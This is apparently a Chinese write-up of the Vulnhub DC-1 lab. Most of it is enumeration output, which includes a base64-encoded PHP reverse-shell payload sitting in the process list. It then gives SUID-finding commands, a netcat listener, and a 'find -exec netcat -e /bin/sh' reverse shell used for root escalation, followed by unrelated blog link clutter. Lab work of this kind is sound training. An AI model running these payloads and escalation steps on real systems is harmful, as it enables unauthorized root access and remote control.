root 3298 0.0 0.2 5196 2356 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd
root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1
www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh
www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh
root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]
root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]
www-data 4398 0.0 0.2 3824 2088 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4857 0.0 0.1 3876 1696 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4858 0.0 0.0 1876 448 ? S 01:08 0:00 tee -a
www-data 5028 0.0 0.1 3860 1416 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 5029 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux [00;31m[-] Process binaries and associated permissions (from above list):[00m
-rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
-rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty
-rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd
-rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind
-rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon
-rwxr-xr-x 1 root root 42748 Apr 16 2013 /usr/sbin/acpid
lrwxrwxrwx 1 root root 34 May 30 2018 /usr/sbin/apache2 -> ../lib/apache2/mpm-prefork/apache2
-rwxr-xr-x 1 root root 21812 Oct 4 2014 /usr/sbin/atd
-rwxr-xr-x 1 root root 43020 Jul 4 2012 /usr/sbin/cron
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwxr-xr-x 1 root root 10585256 Apr 20 2018 /usr/sbin/mysqld
-rwxr-xr-x 1 root root 28832 May 22 2013 /usr/sbin/rpc.idmapd
-rwxr-xr-x 1 root root 388200 Oct 8 2014 /usr/sbin/rsyslogd
-rwxr-xr-x 1 root root 531888 Jan 27 2018 /usr/sbin/sshd [00;31m[-] /etc/init.d/ binary permissions:[00m
total 280
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 1586 Feb 19 23:02 .depend.boot
-rw-r--r-- 1 root root 669 Feb 19 23:02 .depend.start
-rw-r--r-- 1 root root 769 Feb 19 23:02 .depend.stop
-rw-r--r-- 1 root root 2427 Oct 16 2012 README
-rwxr-xr-x 1 root root 2227 Apr 16 2013 acpid
-rwxr-xr-x 1 root root 7820 May 26 2018 apache2
-rwxr-xr-x 1 root root 1071 Jun 25 2011 atd
-rwxr-xr-x 1 root root 1276 Oct 16 2012 bootlogs
-rwxr-xr-x 1 root root 1281 Jul 15 2013 bootmisc.sh
-rwxr-xr-x 1 root root 3816 Jul 15 2013 checkfs.sh
-rwxr-xr-x 1 root root 1099 Jul 15 2013 checkroot-bootclean.sh
-rwxr-xr-x 1 root root 9673 Jul 15 2013 checkroot.sh
-rwxr-xr-x 1 root root 1379 Dec 9 2011 console-setup
-rwxr-xr-x 1 root root 3033 Jul 3 2012 cron
-rwxr-xr-x 1 root root 2813 Feb 6 2015 dbus
-rwxr-xr-x 1 root root 6435 Feb 11 2018 exim4
-rwxr-xr-x 1 root root 1329 Oct 16 2012 halt
-rwxr-xr-x 1 root root 1423 Oct 16 2012 hostname.sh
-rwxr-xr-x 1 root root 3880 Dec 10 2012 hwclock.sh
-rwxr-xr-x 1 root root 7592 Apr 28 2012 kbd
-rwxr-xr-x 1 root root 1591 Oct 1 2012 keyboard-setup
-rwxr-xr-x 1 root root 1293 Oct 16 2012 killprocs
-rwxr-xr-x 1 root root 1990 May 21 2012 kmod
-rwxr-xr-x 1 root root 2405 Sep 26 2016 mcstrans
-rwxr-xr-x 1 root root 995 Oct 16 2012 motd
-rwxr-xr-x 1 root root 670 Feb 24 2013 mountall-bootclean.sh
-rwxr-xr-x 1 root root 2128 Feb 24 2013 mountall.sh
-rwxr-xr-x 1 root root 1508 Jul 15 2013 mountdevsubfs.sh
-rwxr-xr-x 1 root root 1413 Jul 15 2013 mountkernfs.sh
-rwxr-xr-x 1 root root 678 Feb 24 2013 mountnfs-bootclean.sh
-rwxr-xr-x 1 root root 2440 Oct 16 2012 mountnfs.sh
-rwxr-xr-x 1 root root 1731 Jul 15 2013 mtab.sh
-rwxr-xr-x 1 root root 5437 Apr 19 2018 mysql
-rwxr-xr-x 1 root root 4322 Mar 14 2013 networking
-rwxr-xr-x 1 root root 6491 May 22 2013 nfs-common
-rwxr-xr-x 1 root root 1346 May 20 2012 procps
-rwxr-xr-x 1 root root 6120 Oct 16 2012 rc
-rwxr-xr-x 1 root root 782 Oct 16 2012 rc.local
-rwxr-xr-x 1 root root 117 Oct 16 2012 rcS
-rwxr-xr-x 1 root root 639 Oct 16 2012 reboot
-rwxr-xr-x 1 root root 2727 Sep 26 2016 restorecond
-rwxr-xr-x 1 root root 1074 Jul 15 2013 rmnologin
-rwxr-xr-x 1 root root 2344 May 10 2017 rpcbind
-rwxr-xr-x 1 root root 3054 Oct 8 2014 rsyslog
-rwxr-xr-x 1 root root 3200 Oct 16 2012 sendsigs
-rwxr-xr-x 1 root root 590 Oct 16 2012 single
-rw-r--r-- 1 root root 4290 Oct 16 2012 skeleton
-rwxr-xr-x 1 root root 3881 Apr 15 2016 ssh
-rwxr-xr-x 1 root root 8827 Nov 9 2012 udev
-rwxr-xr-x 1 root root 1179 Aug 20 2012 udev-mtab
-rwxr-xr-x 1 root root 2721 Apr 10 2013 umountfs
-rwxr-xr-x 1 root root 2195 Apr 10 2013 umountnfs.sh
-rwxr-xr-x 1 root root 1122 Oct 16 2012 umountroot
-rwxr-xr-x 1 root root 3111 Oct 16 2012 urandom
-rwxr-xr-x 1 root root 1364 Oct 26 2015 virtualbox-guest-utils
-rwxr-xr-x 1 root root 2666 Mar 3 2012 x11-common [00;31m[-] /etc/init/ config file permissions:[00m
total 48
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 01:08 ..
-rw-r--r-- 1 root root 523 Mar 14 2013 network-interface-container.conf
-rw-r--r-- 1 root root 1603 Mar 14 2013 network-interface-security.conf
-rw-r--r-- 1 root root 803 Mar 14 2013 network-interface.conf
-rw-r--r-- 1 root root 1898 Mar 14 2013 networking.conf
-rw-r--r-- 1 root root 567 Feb 24 2013 startpar-bridge.conf
-rw-r--r-- 1 root root 637 Nov 5 2012 udev-fallback-graphics.conf
-rw-r--r-- 1 root root 769 Nov 5 2012 udev-finish.conf
-rw-r--r-- 1 root root 322 Nov 5 2012 udev.conf
-rw-r--r-- 1 root root 356 Nov 5 2012 udevmonitor.conf
-rw-r--r-- 1 root root 352 Nov 5 2012 udevtrigger.conf [00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 4.0K
drwxr-xr-x 6 root root 4.0K Feb 19 22:43 system /lib/systemd/system:
total 56K
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 dbus.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 multi-user.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:43 sockets.target.wants
drwxr-xr-x 2 root root 4.0K Feb 19 22:25 basic.target.wants
-rw-r--r-- 1 root root 353 Feb 10 2015 dbus.service
-rw-r--r-- 1 root root 106 Feb 10 2015 dbus.socket
-rw-r--r-- 1 root root 190 Oct 8 2014 rsyslog.service
-rw-r--r-- 1 root root 164 Apr 29 2013 udev-control.socket
-rw-r--r-- 1 root root 177 Apr 29 2013 udev-kernel.socket
-rw-r--r-- 1 root root 752 Apr 29 2013 udev-settle.service
-rw-r--r-- 1 root root 291 Apr 29 2013 udev-trigger.service
-rw-r--r-- 1 root root 384 Apr 29 2013 udev.service
-rw-r--r-- 1 root root 155 Apr 16 2013 acpid.service
-rw-r--r-- 1 root root 115 Apr 16 2013 acpid.socket /lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket /lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 root root 15 Feb 10 2015 dbus.service -> ../dbus.service /lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 root root 14 Feb 10 2015 dbus.socket -> ../dbus.socket
lrwxrwxrwx 1 root root 22 Apr 29 2013 udev-control.socket -> ../udev-control.socket
lrwxrwxrwx 1 root root 21 Apr 29 2013 udev-kernel.socket -> ../udev-kernel.socket /lib/systemd/system/basic.target.wants:
total 0
lrwxrwxrwx 1 root root 23 Apr 29 2013 udev-trigger.service -> ../udev-trigger.service
lrwxrwxrwx 1 root root 15 Apr 29 2013 udev.service -> ../udev.service [00;33m### SOFTWARE #############################################[00m
[00;31m[-] MYSQL version:[00m
mysql Ver 14.14 Distrib 5.5.60, for debian-linux-gnu (i686) using readline 6.2 [00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data [00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/gcc
/usr/bin/curl [00;31m[-] Installed compilers:[00m
ii checkpolicy 2.1.8-2 i386 SELinux policy compiler
ii gcc 4:4.7.2-1 i386 GNU C compiler
ii gcc-4.7 4.7.2-5 i386 GNU C compiler
ii gcc-4.7-multilib 4.7.2-5 i386 GNU C compiler (multilib files)
ii gcc-multilib 4:4.7.2-1 i386 GNU C compiler (multilib files) [00;31m[-] Can we read/write sensitive files:[00m
-rw-r--r-- 1 root root 1057 Feb 19 23:51 /etc/passwd
-rw-r--r-- 1 root root 612 Feb 19 23:51 /etc/group
-rw-r--r-- 1 root root 851 Jul 30 2011 /etc/profile
-rw-r----- 1 root shadow 870 Feb 28 12:10 /etc/shadow [00;31m[-] SUID files:[00m
-rwsr-xr-x 1 root root 88744 Dec 10 2012 /bin/mount
-rwsr-xr-x 1 root root 31104 Apr 13 2011 /bin/ping
-rwsr-xr-x 1 root root 35200 Feb 27 2017 /bin/su
-rwsr-xr-x 1 root root 35252 Apr 13 2011 /bin/ping6
-rwsr-xr-x 1 root root 67704 Dec 10 2012 /bin/umount
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwsr-xr-x 1 root root 35892 Feb 27 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 45396 Feb 27 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 30880 Feb 27 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 44564 Feb 27 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 66196 Feb 27 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find
-rwsr-xr-x 1 root root 937564 Feb 11 2018 /usr/sbin/exim4
-rwsr-xr-x 1 root root 9660 Jun 20 2017 /usr/lib/pt_chown
-rwsr-xr-x 1 root root 248036 Jan 27 2018 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 5412 Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 321692 Feb 10 2015 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 84532 May 22 2013 /sbin/mount.nfs [00;33m[+] Possibly interesting SUID files:[00m
-rwsr-xr-x 1 root root 162424 Jan 6 2012 /usr/bin/find [00;31m[-] SGID files:[00m
-rwxr-sr-x 1 root ssh 128396 Jan 27 2018 /usr/bin/ssh-agent
-rwsr-sr-x 1 daemon daemon 50652 Oct 4 2014 /usr/bin/at
-rwxr-sr-x 1 root mlocate 30492 Sep 25 2010 /usr/bin/mlocate
-rwxr-sr-x 1 root mail 17908 Nov 18 2017 /usr/bin/lockfile
-rwxr-sr-x 1 root shadow 49364 Feb 27 2017 /usr/bin/chage
-rwxr-sr-x 1 root tty 9708 Jun 11 2012 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 9768 Nov 30 2014 /usr/bin/mutt_dotlock
-rwxr-sr-x 1 root tty 18020 Dec 10 2012 /usr/bin/wall
-rwxr-sr-x 1 root crontab 34760 Jul 4 2012 /usr/bin/crontab
-rwxr-sr-x 1 root shadow 18168 Feb 27 2017 /usr/bin/expiry
-rwsr-sr-x 1 root mail 83912 Nov 18 2017 /usr/bin/procmail
-rwxr-sr-x 1 root mail 13960 Dec 12 2012 /usr/bin/dotlockfile
-rwxr-sr-x 1 root utmp 4972 Feb 21 2011 /usr/lib/utempter/utempter
-rwxr-sr-x 1 root shadow 30332 May 5 2012 /sbin/unix_chkpwd [-] Can't search *.conf files as no keyword was entered [-] Can't search *.php files as no keyword was entered [-] Can't search *.log files as no keyword was entered [-] Can't search *.ini files as no keyword was entered [00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 root root 45 May 7 01:08 /etc/resolv.conf
-rw-r--r-- 1 root root 346 Mar 31 2012 /etc/discover-modprobe.conf
-rw-r--r-- 1 root root 216 Sep 26 2016 /etc/sestatus.conf
-rw-r--r-- 1 root root 1260 May 30 2008 /etc/ucf.conf
-rw-r--r-- 1 root root 834 Jun 8 2012 /etc/gssapi_mech.conf
-rw-r--r-- 1 root root 859 Nov 24 2012 /etc/insserv.conf
-rw-r--r-- 1 root root 144 Feb 19 22:55 /etc/kernel-img.conf
-rw-r--r-- 1 root root 3173 Dec 16 2017 /etc/reportbug.conf
-rw-r--r-- 1 root root 599 Feb 19 2009 /etc/logrotate.conf
-rw-r--r-- 1 root root 6895 Feb 19 22:44 /etc/ca-certificates.conf
-rw-r--r-- 1 root root 284 Sep 25 2010 /etc/updatedb.conf
-rw-r--r-- 1 root root 191 Feb 1 2012 /etc/libaudit.conf
-rw-r--r-- 1 root root 604 May 16 2012 /etc/deluser.conf
-rw-r--r-- 1 root root 2940 Feb 12 2016 /etc/gai.conf
-rw-r--r-- 1 root root 2632 Oct 8 2014 /etc/rsyslog.conf
-rw-r--r-- 1 root root 2082 May 20 2012 /etc/sysctl.conf
-rw-r--r-- 1 root root 214 May 11 2013 /etc/idmapd.conf
-rw-r--r-- 1 root root 956 Feb 22 2015 /etc/mke2fs.conf
-rw-r--r-- 1 root root 552 Apr 30 2012 /etc/pam.conf
-rw-r--r-- 1 root root 2981 Feb 19 22:25 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Dec 26 2012 /etc/debconf.conf
-rw-r--r-- 1 root root 9 Aug 8 2006 /etc/host.conf
-rw-r--r-- 1 root root 34 Feb 19 22:24 /etc/ld.so.conf
-rw-r--r-- 1 root root 475 Aug 29 2006 /etc/nsswitch.conf [00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/flag4/.bash_history
cd
ls
vi flag4.txt
ls
exit [00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x 2 root mail 4096 Feb 19 22:24 .
drwxr-xr-x 12 root root 4096 Feb 19 23:10 .. [00;33m### SCAN COMPLETE ####################################[00m

发现了弱点尝试进行suid提权

参考文章https://pentestlab.blog/2017/09/25/suid-executables/

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

反弹shell

攻击机

root@panli:~# nc -lvvp 8999
listening on [any] 8999 ...

在meterpreter的shell中执行find suidtest -exec netcat -e /bin/sh  192.168.0.117 8999 \;

成功提权

vunlhub-DC-1-LinuxSuid提权的更多相关文章

  1. Linux-SUID提权

    前言 最近打靶场的时候最后都会涉及到提权,所以想着总结一下. SUID提权原理 SUID(设置用户ID)是赋予文件的一种权限,它会出现在文件拥有者权限的执行位上,具有这种权限的文件会在其执行时,使调用 ...

  2. 使用powershell提权的一些技巧

    原文:http://fuzzysecurity.com/tutorials/16.html 翻译:http://www.myexception.cn/windows/1752546.html http ...

  3. LINUX渗透与提权总结

    本文为Linux渗透与提权技巧总结篇,旨在收集各种Linux渗透技巧与提权版本,方便各位同学在日后的渗透测试中能够事半功倍. Linux 系统下的一些常见路径: 001 /etc/passwd 002 ...

  4. 小白日记24:kali渗透测试之提权(四)--利用漏洞提权

    利用漏洞提权实例 前提:已渗透进一个XP或2003系统 一.实验目标漏洞:Ms11-080 补丁:Kb2592799 漏洞信息:https://technet.microsoft.com/librar ...

  5. 滥用DNSAdmins权限进行Active Directory提权

      0x00 前言 除了在实现自己的DNS服务器功能之外,Microsoft还为该服务器实现自己的管理协议以便于管理与Active Directory域集成.默认情况下,域控制器也是DNS服务器; 大 ...

  6. MS14-068域提权漏洞复现

    MS14-068域提权漏洞复现 一.漏洞说明 改漏洞可能允许攻击者将未经授权的域用户账户的权限,提权到域管理员的权限. 微软官方解释: https://docs.microsoft.com/zh-cn ...

  7. 「白帽黑客成长记」Windows提权基本原理(上)

    我们通常认为配置得当的Windows是安全的,事实真的是这样吗?今天让我们跟随本文作者一起深入了解Windows操作系统的黑暗角落,看看是否能得到SYSTEM权限. 作者将使用不同版本的Windows ...

  8. 20165230田坤烨网络对抗免考报告_Windows系统提权

    目录 KERNEL EXPLOITATION 服务攻击: DLL劫持 攻击 不安全的服务权限 探测 unquoted path未被引号标记的路径 探测 攻击 服务注册表键 探测 攻击 Named Pi ...

  9. [转帖]「白帽黑客成长记」Windows提权基本原理(上)

    「白帽黑客成长记」Windows提权基本原理(上) https://www.cnblogs.com/ichunqiu/p/10949592.html 我们通常认为配置得当的Windows是安全的,事实 ...

  10. vulnhub靶机之DC6实战(wordpress+nmap提权)

    0x00环境 dc6靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip dc6以nat模式在vmware上打开 kali2019以nat模式启动,ip地址为 ...

随机推荐

  1. 移动 H5 首屏秒开优化方案探讨

    转载bang大神文章,原文<移动 H5 首屏秒开优化方案探讨>,此文仅仅用做自学与分享! 随着移动设备性能不断增强,web 页面的性能体验逐渐变得可以接受,又因为 web 开发模式的诸多好 ...

  2. RocketMQ Py客户端

    #!/bin/bash yum install make cmake gcc-c++ python-devel zlib-devel cd /home/amy git clone https://gi ...

  3. 安卓权威编程指南 挑战练习(第26章 在 Lollipop 设备上使用 JobService)

    26.11 挑战练习:在 Lollipop 设备上使用 JobService 请创建另一个 PollService 实现版本.新的 PollService 应该继承 JobService 并使用 Jo ...

  4. [置顶] 利用Python 提醒实验室同学值日(自动发送邮件)

    前言: 在实验室里一直存在着一个问题,就是老是有人忘记提醒下一个人值日,然后值日就被迫中断了.毕竟良好的        卫生环境需要大家一起来维护的!没办法只能想出一些小对策了. 解决思路: 首先,我 ...

  5. CSS——NO.2(CSS样式的基本知识)

    */ * Copyright (c) 2016,烟台大学计算机与控制工程学院 * All rights reserved. * 文件名:text.cpp * 作者:常轩 * 微信公众号:Worldhe ...

  6. tcpdump常用方法

    tcpdump -i eth0监视制定网络接口的数据包 tcpdump host 10.13.1.135监视所有10.13.1.135主机收到和发出的数据包 tcpdump src host 10.1 ...

  7. jQuery样式及html属性操作

    样式及html属性操作1,行内样式 css(); a:获取样式 元素.css(样式名称); b:设置单个样式 元素.css("样式名称":"样式值"); c:设 ...

  8. sofa-bolt源码阅读(1)-服务端的启动

    Bolt服务器的核心类是RpcServer,启动的时候调用父类AbstractRemotingServer的startup方法. com.alipay.remoting.AbstractRemotin ...

  9. 什么是Activiti

    什么是Activiti Activiti属于工作流引擎的一个开源实现.Activiti由Tom Bayen发起.在2010年5月发布了第一个版本.命名也很有意思的采取了Activities(活动)的化 ...

  10. Nginx之反向代理配置(二)

    前文我们聊了Nginx的防盗链.反向代理以及开启nginx代理缓存,回顾请参考https://www.cnblogs.com/qiuhom-1874/p/12417130.html:今天我们继续说ng ...